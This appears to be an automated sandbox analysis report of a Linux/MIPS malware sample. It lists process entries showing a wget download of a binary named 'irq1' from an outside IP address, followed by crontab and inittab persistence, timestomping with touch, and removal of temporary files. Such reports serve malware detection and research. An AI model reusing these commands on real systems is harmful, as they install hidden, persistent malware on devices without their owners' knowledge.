    Analysis Process: irq0 PID: 9616 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9618 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9620 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9622 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9623 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9624 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9628 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9630 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9632 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9634 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9636 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9638 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9640 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9642 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9644 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9646 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9648 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9650 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9652 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9654 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9656 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9657 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9659 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9660 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9663 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9664 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9665 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9671 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9672 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9673 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9674 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9679 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9680 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9683 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9684 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9685 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9686 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9691 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9693 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9694 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9695 Parent PID: 8487

    General

    Start time:05:30:24
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9701 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9702 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9703 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9707 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9708 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9709 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9713 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9715 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9716 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9719 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9721 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9723 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9725 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9727 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9729 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9731 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9733 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9735 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9737 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9739 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9740 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9742 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9744 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9747 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9749 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9751 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9753 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9755 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9757 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9759 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq0 PID: 9761 Parent PID: 8487

    General

    Start time:05:30:25
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5283 Parent PID: 4580

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: wget PID: 5283 Parent PID: 4580

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/usr/bin/wget
    Arguments:wget http://71.127.148.69/.x/irq1 -O irq1
    File size:474656 bytes
    MD5 hash:458ce58ac4b1aac3eafc287fa46bf92d

    Analysis Process: sh PID: 5974 Parent PID: 4580

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 5974 Parent PID: 4580

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod +x irq1
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 5977 Parent PID: 4580

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 5977 Parent PID: 4580

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod 700 irq1
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 5978 Parent PID: 4580

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: irq1 PID: 5978 Parent PID: 4580

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:./irq1
    Arguments:/usr/bin/qemu-mips ./irq1
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 6069 Parent PID: 5978

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 6069 Parent PID: 5978

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "chmod 700 /tmp/irq1 > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 6078 Parent PID: 6069

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 6078 Parent PID: 3310

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod 700 /tmp/irq1
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: irq1 PID: 6079 Parent PID: 5978

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 6079 Parent PID: 5978

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "touch -acmr /bin/ls /tmp/irq1"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 6098 Parent PID: 6079

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: touch PID: 6098 Parent PID: 6079

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/usr/bin/touch
    Arguments:touch -acmr /bin/ls /tmp/irq1
    File size:10 bytes
    MD5 hash:1f168f69957c0fffbdd62556ad215f3c

    Analysis Process: irq1 PID: 6103 Parent PID: 5978

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 6103 Parent PID: 5978

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "(crontab -l | grep -v \"/tmp/irq1\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 6113 Parent PID: 6103

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 6118 Parent PID: 6113

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: crontab PID: 6118 Parent PID: 6113

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/usr/bin/crontab
    Arguments:crontab -l
    File size:36080 bytes
    MD5 hash:ff68fd30f0037fd7e9c1fdf5a035f739

    Analysis Process: sh PID: 6119 Parent PID: 6113

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: grep PID: 6119 Parent PID: 6113

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/grep
    Arguments:grep -v /tmp/irq1
    File size:211224 bytes
    MD5 hash:fc9b0a0ff848b35b3716768695bf2427

    Analysis Process: sh PID: 6120 Parent PID: 6113

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: grep PID: 6120 Parent PID: 6113

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/grep
    Arguments:grep -v "no cron"
    File size:211224 bytes
    MD5 hash:fc9b0a0ff848b35b3716768695bf2427

    Analysis Process: sh PID: 6121 Parent PID: 6113

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: grep PID: 6121 Parent PID: 6113

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/grep
    Arguments:grep -v lesshts/run.sh
    File size:211224 bytes
    MD5 hash:fc9b0a0ff848b35b3716768695bf2427

    Analysis Process: irq1 PID: 6154 Parent PID: 5978

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 6154 Parent PID: 5978

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "echo \"* * * * * /tmp/irq1 > /dev/null 2>&1 &\" >> /var/run/.x00740882966"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: irq1 PID: 6165 Parent PID: 5978

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 6165 Parent PID: 5978

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "crontab /var/run/.x00740882966"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 6170 Parent PID: 6165

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: crontab PID: 6170 Parent PID: 6165

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/usr/bin/crontab
    Arguments:crontab /var/run/.x00740882966
    File size:36080 bytes
    MD5 hash:ff68fd30f0037fd7e9c1fdf5a035f739

    Analysis Process: irq1 PID: 6184 Parent PID: 5978

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 6184 Parent PID: 5978

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "rm -rf /var/run/.x00740882966"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 6212 Parent PID: 6184

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: rm PID: 6212 Parent PID: 6184

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/rm
    Arguments:rm -rf /var/run/.x00740882966
    File size:60272 bytes
    MD5 hash:b79876063d894c449856cca508ecca7f

    Analysis Process: irq1 PID: 6218 Parent PID: 5978

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 6218 Parent PID: 5978

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "cat /etc/inittab | grep -v \"/tmp/irq1\" > /etc/inittab2"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 6230 Parent PID: 6218

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: cat PID: 6230 Parent PID: 6218

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/cat
    Arguments:cat /etc/inittab
    File size:52080 bytes
    MD5 hash:efa10d52f37361f2e3a5d22742f0fcc4

    Analysis Process: sh PID: 6231 Parent PID: 6218

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: grep PID: 6231 Parent PID: 6218

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/grep
    Arguments:grep -v /tmp/irq1
    File size:211224 bytes
    MD5 hash:fc9b0a0ff848b35b3716768695bf2427

    Analysis Process: irq1 PID: 6249 Parent PID: 5978

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 6249 Parent PID: 5978

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "echo \"0:2345:respawn:/tmp/irq1\" >> /etc/inittab2"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: irq1 PID: 6256 Parent PID: 5978

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 6256 Parent PID: 5978

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "cat /etc/inittab2 > /etc/inittab"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 6265 Parent PID: 6256

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: cat PID: 6265 Parent PID: 6256

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/cat
    Arguments:cat /etc/inittab2
    File size:52080 bytes
    MD5 hash:efa10d52f37361f2e3a5d22742f0fcc4

    Analysis Process: irq1 PID: 6266 Parent PID: 5978

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 6266 Parent PID: 5978

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "rm -rf /etc/inittab2"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 6268 Parent PID: 6266

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: rm PID: 6268 Parent PID: 6266

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/rm
    Arguments:rm -rf /etc/inittab2
    File size:60272 bytes
    MD5 hash:b79876063d894c449856cca508ecca7f

    Analysis Process: irq1 PID: 6271 Parent PID: 5978

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 6271 Parent PID: 5978

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "touch -acmr /bin/ls /etc/inittab"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 6303 Parent PID: 6271

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: touch PID: 6303 Parent PID: 6271

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/usr/bin/touch
    Arguments:touch -acmr /bin/ls /etc/inittab
    File size:10 bytes
    MD5 hash:1f168f69957c0fffbdd62556ad215f3c

    Analysis Process: irq1 PID: 6305 Parent PID: 5978

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: irq1 PID: 6310 Parent PID: 6305

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 6310 Parent PID: 6305

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "/bin/uname -n"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 6320 Parent PID: 6310

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: uname PID: 6320 Parent PID: 6310

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/uname
    Arguments:/bin/uname -n
    File size:31440 bytes
    MD5 hash:1078d9dca4e90919f7b2433cae105008

    Analysis Process: irq1 PID: 6321 Parent PID: 6305

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 6321 Parent PID: 6305

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "/bin/uname -n"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 6341 Parent PID: 6321

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: uname PID: 6341 Parent PID: 6321

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/uname
    Arguments:/bin/uname -n
    File size:31440 bytes
    MD5 hash:1078d9dca4e90919f7b2433cae105008

    Analysis Process: irq1 PID: 6344 Parent PID: 6305

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:./irq1
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 6344 Parent PID: 6305

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "/bin/uname -n"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

